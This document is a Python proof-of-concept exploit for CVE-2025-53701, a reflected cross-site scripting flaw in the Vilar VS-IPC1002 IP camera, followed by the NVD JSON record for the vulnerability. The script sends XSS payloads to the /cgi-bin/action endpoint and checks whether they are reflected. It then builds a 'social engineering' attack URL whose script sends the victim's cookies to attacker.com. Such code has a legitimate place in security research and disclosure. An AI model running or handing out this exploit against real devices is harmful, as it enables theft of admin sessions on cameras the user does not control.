CVE-2025-53701

import requests # CVE-2025-53701 PoC - Vilar VS-IPC1002 Reflected XSS # Target: Vilar VS-IPC1002 IP Camera # Endpoint: /cgi-bin/action TARGET = "http://target-ip:80" ENDPOINT = "/cgi-bin/action" def create_xss_payload(): """Generate XSS payload for CVE-2025-53701""" # Basic XSS payload to test reflection payloads = [ '<script>alert(document.domain)</script>', '<img src=x onerror=alert(document.cookie)>', '<svg/onload=alert(document.cookie)>' ] return payloads def test_reflected_xss(): """Test for reflected XSS in /cgi-bin/action endpoint""" # Common vulnerable parameters params_to_test = ['param', 'action', 'id', 'name', 'value', 'type'] print(f"[*] Testing {TARGET}{ENDPOINT} for CVE-2025-53701") print(f"[*] Target: Vilar VS-IPC1002 IP Camera") print("-" * 60) for param in params_to_test: for payload in create_xss_payload(): try: url = f"{TARGET}{ENDPOINT}" data = {param: payload} response = requests.get(url, params=data, timeout=10) # Check if payload is reflected without encoding if payload in response.text: print(f"[!] VULNERABLE - Parameter '{param}' reflects payload") print(f" Payload: {payload}") print(f" URL: {response.url}") return True except requests.RequestException as e: print(f"[-] Error testing {param}: {e}") print("[*] No obvious XSS reflection detected") return False def generate_attack_url(target_ip, payload): """Generate malicious URL for social engineering attack""" malicious_url = f"http://{target_ip}/cgi-bin/action?param={payload}" return malicious_url if __name__ == "__main__": test_reflected_xss() # Example attack URL generation example_ip = "192.168.1.100" xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' attack_url = generate_attack_url(example_ip, xss_payload) print(f"\n[*] Example attack URL:\n{attack_url}") print("\n[!] Note: This PoC is for authorized security testing only")

{"cve": {"id": "CVE-2025-53701", "sourceIdentifier": "[email protected]", "published": "2025-10-23T14:15:39.107", "lastModified": "2025-11-04T13:10:52.810", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Vilar VS-IPC1002 IP cameras are vulnerable to Reflected XSS (Cross-site Scripting) attacks, because parameters in GET requests sent to /cgi-bin/action endpoint are not sanitized properly, making it possible to target logged in admin users.\nThe vendor did not respond in any way. Only version 1.1.0.18 was tested, other versions might be vulnerable as well."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vimicro:vs-ipc1002_firmware:1.1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "BFF3572F-8791-43CE-A735-95568316F29B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vimicro:vs-ipc1002:-:*:*:*:*:*:*:*", "matchCriteriaId": "A7B7DA5F-FE1C-461D-A957-60AB93BAD83F"}]}]}], "references": [{"url": "https://cert.pl/en/posts/2025/10/CVE-2025-53701", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}